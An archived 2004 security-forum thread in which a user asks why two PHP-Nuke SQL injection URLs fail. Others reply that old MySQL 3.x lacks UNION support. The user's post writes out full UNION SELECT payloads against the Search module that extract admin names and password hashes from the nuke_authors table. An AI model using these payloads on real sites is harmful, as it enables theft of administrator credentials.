 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
Issues concerning PHPNuke SQL Injection |
 |
 Posted: Tue Jul 20, 2004 5:23 am |
 |
|
| Inferno96 |
| Beginner |
 |
|
| Joined: Jul 20, 2004 |
| Posts: 3 |
|
|
|
 |
|
 |
|
I can't seem to get even the latest SQL Injection (part 3) in the search module to work. It always gives me a
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/httpd/vhosts/fouclan.com/httpdocs/includes/sql_layer.php on line 238
for the: modules.php?name=Search&type=comments&query=not123exists&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors
as well as other exploits. Even the latest Search exploit using
http://localhost/nuke73/modules.php?name=Search&type=stories&query=f00bar&category=-1
&categ=%20and%201=2%20UNION%20SELECT%200,0,aid,pwd,0,0,0,0,0,0%20from%20nuke_authors/*
gave me a similar result.
I'm not an expert in SQL injection, but I have at least read all the links posted and understand what was discussed and some things not disscused.
Any help would be appreciated.
(I doubt they've patched the last one, it's not even out on Securityfocus yet). |
|
|
|
|
|
|
|
|
| Posted: Tue Jul 20, 2004 7:57 am |
|
|
| genoxide |
| Regular user |
 |
|
| Joined: Jun 14, 2004 |
| Posts: 15 |
|
|
|
|
|
|
|
|
|
|
|
| Posted: Tue Jul 20, 2004 10:45 am |
|
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
Reason of exploit failure is simple - mysql version is probably 3.x,
not 4.x , so UNION functionality is missing and all you will get,
is just full path disclosure  |
|
|
|
|
|
a |
|
| Posted: Tue Jul 20, 2004 2:14 pm |
|
|
| SteX |
| Advanced user |
 |
|
| Joined: May 18, 2004 |
| Posts: 181 |
| Location: Serbia |
|
|
|
|
|
|
| Yes, 90% of servers have old mysql 3.x without Union.. |
|
_________________
We would change the world, but God won't give us the sourcecode...
....Watch the master. Follow the master. Be the master....
------------------------------------------------------- |
|
|
|
| Posted: Tue Jul 20, 2004 4:38 pm |
|
|
| Inferno96 |
| Beginner |
|
|
| Joined: Jul 20, 2004 |
| Posts: 3 |
|
|
|
|
|
|
|
| Thanks a lot guys, I figured that was probably it from previous posts i'd read. Well I can easily work from there, thanks again! |
|
|
|
|
| Posted: Tue Jul 20, 2004 7:25 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
Well, life goes on and progress goes on. So there will be time when 90% of mysql
installations are 4.0 and 10% are 4.1 (with subselects, mmm, my favorite)...  |
|
|
|
|
www.waraxe.us Forum Index -> PhpNuke
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 47
Members: 0
Total: 47
